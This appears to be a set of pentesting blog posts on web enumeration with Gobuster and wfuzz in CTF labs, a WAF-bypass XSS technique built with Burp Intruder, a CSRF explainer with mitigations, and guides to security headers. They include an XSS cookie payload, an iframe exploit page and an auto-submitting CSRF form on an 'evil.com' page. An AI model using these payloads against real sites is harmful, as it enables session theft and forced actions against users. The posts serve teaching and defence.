Likely, the webserver you’re attacking is configured to always respond with a 200 response code. For example, let’s look at BART on Hack The Box.
Let’s see if we can extract anything with curl. We’ll start by sending a request to the default page. We see that it returns a 302 redirect to forum.bart.htb.
curl -vvv 10.10.10.81
Let’s try a request to a page we know doesn’t exist, and we get back a 200 success response that displays an image. This explains why Gobuster was returning a 200 for every directory.
We can confirm this by browsing to the page and looking at the image.
Armed with this information, we know that 200 response codes are bad, but other response codes (such as a 302) indicate a directory is present. Let’s rerun our Gobuster command, but we’ll specify which response codes we want returned.
Checking the help page, we can see that Gobuster accepts the following response codes: 200, 204, 301, 302, 307, 401, 403.
So our command will look like this.
gobuster dir -u http://10.10.10.81 -w /usr/share/dirbuster/wordlists/directory-list-lowercase-2.3-medium.txt -s "204,301,302,307,401,403"
And with that command running, we eventually start to get some real results back.
This guide is going to use CMess from TryHackMe as an example, but does not intend to serve as a walkthrough or write-up of the machine.
Before we begin, make sure you can resolve the domain name that we’re targeting. If you’re doing this in a CTF-type environment, you may need to update your /etc/hosts file with the hostname/address of the target.
We can use a tool called wfuzz to brute-force subdomains, but first, we’ll need a wordlist to use.
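A sketch of that wfuzz command is below. The hostname cmess.thm and the SecLists wordlist path are assumptions; adjust both for your target. The trick is fuzzing the Host header so the webserver routes us to each candidate virtual host:

```shell
# fuzz the Host header with candidate subdomains (cmess.thm and the wordlist path are assumed)
wfuzz -c -w /usr/share/seclists/Discovery/DNS/subdomains-top1million-5000.txt \
  -u "http://cmess.thm" -H "Host: FUZZ.cmess.thm"
```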
Depending on how the site is configured, you may get a ton of output that appears to show valid subdomains. If you notice a large number of results with the same word count, this may just be an indication that the site returns a 200 response but displays a “Not found” error.
To remove results with a specific word count, you can append --hw <value> to your command. For example, our new command that hides results with a word count of 290 would look like the following:
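A sketch of that filtered command (the wordlist path and the cmess.thm hostname are assumptions for a vhost brute force):

```shell
# same fuzz as before, but hide responses whose word count is 290 (the assumed "Not found" size)
wfuzz -c -w /usr/share/seclists/Discovery/DNS/subdomains-top1million-5000.txt \
  -u "http://cmess.thm" -H "Host: FUZZ.cmess.thm" --hw 290
```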
This will return a list of subdomains that do not contain a word count of 290. If you get a successful result, make sure you’re able to resolve the subdomain as well before trying to browse to it. If you’re in a CTF-type environment, you may need to update your /etc/hosts file.
With our /etc/hosts file updated, we should be able to browse to the page.
This post intends to serve as a guide for a common bypass technique when you’re up against a web application firewall (WAF). In the event that the WAF limits what tags and attributes are allowed to be passed, we can use BurpSuite’s Intruder functionality to learn which tags are allowed.
Table of Contents:
Setting the stage.
Identifying which tags are allowed.
Identifying which events are allowed.
Putting the pieces together.
Setting the stage.
In our example, we have a webapp with a vulnerable search field. To begin testing, we start out with a simple XSS payload that will display the session cookie of the user when it fails to load a bad image path.
<img src=1 onerror=alert(document.cookie)>
However, the webserver responds with an error stating we’re using a tag that isn’t allowed.
Identifying which tags are allowed.
Let’s spin up BurpSuite and capture a web request with a generic search term.
With our request captured, let’s send this off to Intruder.
To begin, let’s click Clear to remove the default payload positions BurpSuite selected for us.
Now we will replace the search term with <> to open/close the script tags that we wish to send to the application. Place the cursor between the angle brackets and click Add § twice, to create a payload position. The value of the search term should now look like: <§§>
Now that we have the position set, we need to provide our list of payloads. Head over to PortSwigger’s XSS cheat sheet and click Copy tags to clipboard.
With a list of all tags copied to your clipboard, head back to Intruder and select the Payload tab. Then click Paste.
Everything should now be in place! Let’s click Start Attack and allow time for all of the requests to be made.
Once the attack finishes, we see that the Body tag returns a status code of 200. This indicates that the WAF allows this tag and perhaps we can use it for our exploitation process.
Identifying which events are allowed.
Now that we know we can use the body tag, we need to know which events we can use. We’ll repeat the same process we used above, but this time, we’ll Copy events to clipboard from the PortSwigger’s XSS cheat sheet.
Heading back to Intruder, we’ll start by adjusting our list of Payloads. Click Clear to remove the existing list.
Now we can Paste our list of events.
Let’s head over to the Positions tab and adjust our search term to <body%20=1>. Place your cursor before the equal sign and then click Add § twice to create the payload position. The value of the search term should now look like: <body%20§§=1>
This will cause BurpSuite to send requests to the search field with each event name from our list substituted into the payload position.
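For example, the request lines might look like the following (the search parameter name and these particular event names are illustrative; the actual events come from the pasted PortSwigger list):

```http
GET /?search=<body%20onactivate=1> HTTP/1.1
GET /?search=<body%20onbeforeinput=1> HTTP/1.1
GET /?search=<body%20onresize=1> HTTP/1.1
```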
Observe the results, and notice that the only payload returning a 200 response is onresize.
Putting the pieces together.
As an attacker, let’s spin up a malicious webpage that includes a reference to the vulnerable webapp within an iframe.
We begin by inserting an iframe to our webpage that will display content from the vulnerable webapp.
We then inject a search query that will generate an alert containing the victim’s session cookie when the element onresize is called within the body tag.
We then force the iframe to resize itself to a width of 100px upon loading.
When the victim browses to our malicious website, this iframe will be loaded in their browser, resized, and then the session cookie will be displayed back to them.
Now this is really just useful as a proof of concept, because this particular example doesn’t provide the attacker with the session cookie. The finished product would look something like this after including HTML encoding.
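One common shape for such an exploit page is sketched below. The vulnerable host, the search parameter name, and the encoding of the payload inside the iframe src are placeholders to adapt to the target; the onload handler performs the resize to 100px described above:

```html
<!-- iframe loads the vulnerable search page with the XSS payload encoded in the query string;
     onload shrinks the frame, firing the body's onresize handler in the victim's browser -->
<iframe
  src="https://vulnerable-website.example/?search=%22%3E%3Cbody%20onresize%3Dalert(document.cookie)%3E"
  onload="this.style.width='100px'">
</iframe>
```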
We can also leverage the following wordlist to look for CGI URLs.
gobuster dir -u http://<address>/ -w /usr/share/dirb/wordlists/vulns/cgis.txt -s '200,204,301,302,307,403,500' -e
Note: If you start getting spammed with a particular response code, you can remove that from the -s flag.
If you find a cgi-bin directory, you may want to consider scanning it for .sh files. If one is found, see if the machine is vulnerable to Shellshock. There is an Nmap script that can identify the vulnerability, but it isn’t always reliable, so it may be beneficial to run the requests through a tool like Burp and inspect them.
This is a tool you can get from Github. It provides much of the same functionality as Gobuster.
The following syntax will run the tool to enumerate php and html files, excluding responses with codes 400, 401, and 403.
Enumerating valid parameters in URLs. You can run the following command to try to brute-force valid parameter names:

wfuzz -u http://<address>/?FUZZ=index -w /usr/share/seclists/Discovery/Web-Content/common.txt
Once you feel you’ve enumerated everything, just check your work against this list to make sure you’re not missing anything.
Did you brute force directories?
Did your brute force search recursively?
Did your brute force include file extensions?
Is your brute force case-sensitive?
Did you enumerate the hostname of the box and update your /etc/hosts file to include it?
Did you enumerate subdomains?
Did you brute force directories when browsing to it via hostname?
Did you review every webpage on the box for clues?
Did you review the source code?
Are there usernames hidden anywhere?
Are there specific version details provided?
Did you check for vulnerable technologies?
If you’re able to enumerate version information, did you searchsploit and/or research for public exploits?
What about for PHP or ASP?
What about for WordPress or Drupal?
What about for Apache or IIS?
Can you use a specific tool like WPSCAN to enumerate further?
Did you find a login page?
Can you enumerate multiple users on it?
Can you brute-force it?
Can you perform an injection attack (SQL, XSS, etc.)?
If there is HTTPS on the page, did you check the certificate for details?
Does the cert contain specific email addresses?
Does the cert contain information about a hostname of the box?
Is the cert valid on other domain-names?
Are there other ports running HTTP or HTTPS that you need to repeat all of this on?
It became apparent to me that my understanding of CSRF was lacking, or uh, basically non-existent. This post aims to fix that! Come learn about it along with me.
Note: This particular post is NOT a hacking tutorial on abusing CSRF, though I’m sure I will post one in the near future (make sure to subscribe or hit up my Twitter feed so you’ll know when that comes out).
What is Cross Site Request Forgery?
Well, we know that it consistently appears in the OWASP Top 10 for web application vulnerabilities, but what does it actually do?
CSRF is when another website is able to make a request, as a victim user, to the target website. What does that mean? Well, it means that an attacker may trick the users of a web application into performing unwanted tasks, such as transferring funds, changing their email address, deleting their account, posting a comment, etc.
Let’s say there is a web application running on vulnerable.com (please don’t try to actually visit this site, I have no idea what is there and whether or not it’s a valid webpage). In our fake scenario, vulnerable.com hosts a simple web application where you can create an account and post a comment on a text board. There is also a page for you to be able to delete your account. Normally, if an end user wanted to actually delete their account, they would browse to this page, click the confirmation button, and then a request would be made to the webserver that looks something like this:
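Something like the following (the exact path, cookie name, and form body are illustrative):

```http
POST /delete_my_account HTTP/1.1
Host: vulnerable.com
Cookie: SessionID=d4c0ffee1234
Content-Type: application/x-www-form-urlencoded

confirm=yes
```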
The key items to note are that this is a POST request to vulnerable.com/delete_my_account for a specific SessionID. Now in a perfect world, the only person who would initiate this request would be the actual end user behind that SessionID, but what if we, as evil hackers, wanted to delete the account for them without their consent?
This is where CSRF comes in. Let’s, as attackers, spin up a malicious webpage at evil.com (same disclaimer as before) and add code so that we initiate that same request mentioned above once a user accesses our webpage. If vulnerable.com doesn’t have protections in place, we could leverage CSRF to send the same POST request and delete user accounts on a completely separate website without the user’s consent.
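A minimal sketch of what that code on evil.com could look like is a hidden, auto-submitting form (the endpoint matches the example above; the form field is illustrative). The victim's browser attaches their vulnerable.com session cookie to the cross-site POST automatically:

```html
<!-- auto-submits a cross-site POST to the vulnerable endpoint;
     the browser sends the victim's existing session cookie with it -->
<form action="https://vulnerable.com/delete_my_account" method="POST" id="csrf">
  <input type="hidden" name="confirm" value="yes">
</form>
<script>document.getElementById('csrf').submit();</script>
```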
So how do we mitigate this?
There are a number of mitigation techniques.
Add a hash (session ID, function name, server-side secret) to all forms. This method involves including a random, unique identifier in web forms when a user accesses the page. The idea behind this technique is that an attacker’s webserver has no way of knowing which unique identifier is in use for the victim user on the target website. This means that even if they attempt a CSRF attack, the target website will notice that the unique identifier is missing and reject the POST request.
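As a rough sketch of the idea, a server could mint a random per-form token and embed it in the page, then reject any POST that doesn’t echo it back (openssl availability is assumed; real frameworks provide this for you):

```shell
# mint an unguessable 32-byte token; the server stores it in the user's session
# and compares it against the csrf_token field on every state-changing POST
token=$(openssl rand -hex 32)
printf '<input type="hidden" name="csrf_token" value="%s">\n' "$token"
```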
Checking the Referer header in the client’s HTTP request. When a web request is submitted, there is typically a Referer header added that specifies where the request originated. Ensuring that the request came from the original site means that attacks from other sites will not function.
Note: This method may not always be reliable for web developers if the user utilizes an ad-blocker or additional privacy protections, as the Referer header on a valid web request may indicate the request came from one of these third parties.
Signing out of webapps when not in use. While CSRF is really a problem with the web application, and not the end user utilizing the webpage, users can protect themselves by signing out of, or killing any active sessions for, their sensitive webapps BEFORE browsing the web or accessing a different page.
This post intends to discuss the three most common HTTP headers that leak server information. While these headers don’t do anything to help protect against attacks, they can be used by attackers to enumerate the underlying technologies behind the application during the early enumeration phase of an attack.
What does this header do? This header contains information about the software used by the back-end server (type and version).
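One quick way to check it yourself (a sketch; replace <address> with your target):

```shell
# fetch only the response headers and pull out the Server banner
curl -sI http://<address> | grep -i '^server:'
```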
We’re able to identify that this webserver is running IIS 8.5 based on the Server header.
What does this header do? It contains the details of the web framework or programming language used in the web application.
We’re able to identify exactly which PHP version is being used on this webserver by its X-Powered-By header.
What does this header do? As the name suggests, it shows the version details of the ASP .NET framework. This information may help an adversary fine-tune their attack based on the framework and its version.
We’re able to identify exactly what ASP .NET version is running on this webserver based on the X-AspNet-Version header.
Why do we care? What can we do about it?
Why is this dangerous? Because these headers leak software information, an attacker knows exactly which web technologies are in place and their associated version(s). Armed with this information, they can then hunt for publicly known exploits against those versions.
What is your recommendation? The server information can be masked by re-configuring the webserver to read something other than the actual server technologies in place.
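For example, sketches for two common servers (directive availability depends on your build and modules):

```
# nginx (nginx.conf): hide the version number in the Server header
server_tokens off;

# Apache (httpd.conf): report only "Apache", with no version or OS details
ServerTokens Prod
```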
This post intends to serve as a guide for some of the most common HTTP Headers web applications use to prevent exploitation of potential vulnerabilities. Within this article, you will discover the name of the various headers, along with their use case and various configuration options.
What does this header do? HTTP Strict Transport Security instructs the browser to access the webserver over HTTPS only.
Why would we use this? By enforcing the use of HTTPS, we’re ensuring that users accessing the web page have a secure, encrypted connection. This can also help users notice whether they are victims of a man-in-the-middle attack, since they will receive certificate errors even though a valid certificate is in place on the webpage.
What values can we set this header to? There are 3 directives for this header:
max-age : Commonly set to 31536000 (one year). This is the maximum time for which the header is valid; the server refreshes this time with every new response to prevent it from expiring.
includeSubDomains : This applies the policy to subdomains of the website as well.
preload : This refers to a list maintained by Google. Websites on this list will automatically have HTTPS enforced in the Google Chrome browser.
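Put together, a response header enabling all three directives looks like:

```http
Strict-Transport-Security: max-age=31536000; includeSubDomains; preload
```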
What does this header do? Content Security Policy is used to instruct the browser to load only the allowed content defined in the policy. This uses a whitelisting approach which tells the browser from where to load the images, scripts, CSS, applets, etc.
Why would we use this? If implemented properly, we would be able to prevent exploitation of Cross-Site Scripting (XSS), Clickjacking, and HTML Injection attacks. We do this by carefully specifying where content can be loaded from, which hopefully isn’t a location that attackers have control of.
What values can we set this header to? The values can be defined with the following directives:
default-src 'self' : Load everything from the current domain.
script-src runscript.com : Scripts can only be loaded from runscript.com
media-src online123.com online321.com : Media can only be loaded from online123.com and online321.com.
img-src * : Images can be loaded from anywhere.
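Combining directives like the ones above (using the same example source hosts), a policy header could look like:

```http
Content-Security-Policy: default-src 'self'; script-src runscript.com; media-src online123.com online321.com; img-src *
```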
What does this header do? This header indicates whether the response can be shared with requesting code from the given origin.
Why would we use this? This is used to take a whitelisting approach on which third parties are allowed to access a given resource. For example, if site ABC wants to access a resource on site XYZ (and is allowed to), XYZ will respond with an Access-Control-Allow-Origin header containing the address of site ABC to instruct the browser that this is allowed.
What values can we set this header to? The following directives can be used:
* : For requests without credentials, you can specify a wildcard to tell browsers to allow requesting code from any origin to access the resource.
<origin> : Specifies a single origin.
null : This should not be used, as an attacker can cause a request to carry a null origin (for example, from a sandboxed iframe).
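Continuing the ABC/XYZ example above, XYZ’s response might include (the domain is illustrative):

```http
Access-Control-Allow-Origin: https://abc.example.com
```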
Why would we use the additional attributes? Using these additional attributes can help protect the cookies against unauthorized access.
What values can we apply? While there are many attributes for a cookie, the following are most important from a security perspective.
Secure : A cookie set with this attribute will only be sent over HTTPS and not over the clear-text HTTP protocol (which is susceptible to eavesdropping).
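For example (the cookie name and value are illustrative):

```http
Set-Cookie: SessionID=d4c0ffee1234; Secure
```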
What does this header do? This header can be used to indicate whether or not a browser should be allowed to render a page in a <frame>, <iframe> or <object>.
Why would we use this? Use this to avoid clickjacking attacks. Without clickjacking protections, an adversary could trick a user into accessing a malicious website which loads the target application into an invisible iframe. When the user clicks on the malicious application (e.g., a web-based game), the clicks are ‘stolen’ and sent to the target application (clickjacking). As a result, the user clicks on the legitimate application without their consent, which could result in unwanted actions being performed (e.g., deleting an account).
What values can we set this header to? There are 3 directives we can use:
deny : This will not allow the page to be loaded in a frame on any website.
sameorigin : This will allow the page to be loaded in a frame only if the framing page is from the same origin.
allow-from uri : The frame can only be displayed in a frame on the specified domain/origin.
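In a response, the directive values are conventionally written in uppercase, for example:

```http
X-Frame-Options: SAMEORIGIN
```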
What does this header do? This header enables the Cross-site scripting (XSS) filter built into most recent web browsers.
Why would we use this? The sole purpose is to protect against Cross-Site Scripting (XSS) attacks.
What values can we set this header to? There are 3 modes that we can set this header to:
0; : Disables the XSS filter.
1; : Enables the filter. If an attack is detected, the browser will sanitize the content of the page in order to block the script execution.
1; mode=block : Will prevent the rendering of the page if an XSS attack is detected.
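For example, the strictest of the three modes would be sent as:

```http
X-XSS-Protection: 1; mode=block
```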
This is nowhere near an exhaustive list of the different security headers you should be using. If you’d like to learn more or dive deeper into this topic, I’d recommend checking out the following websites: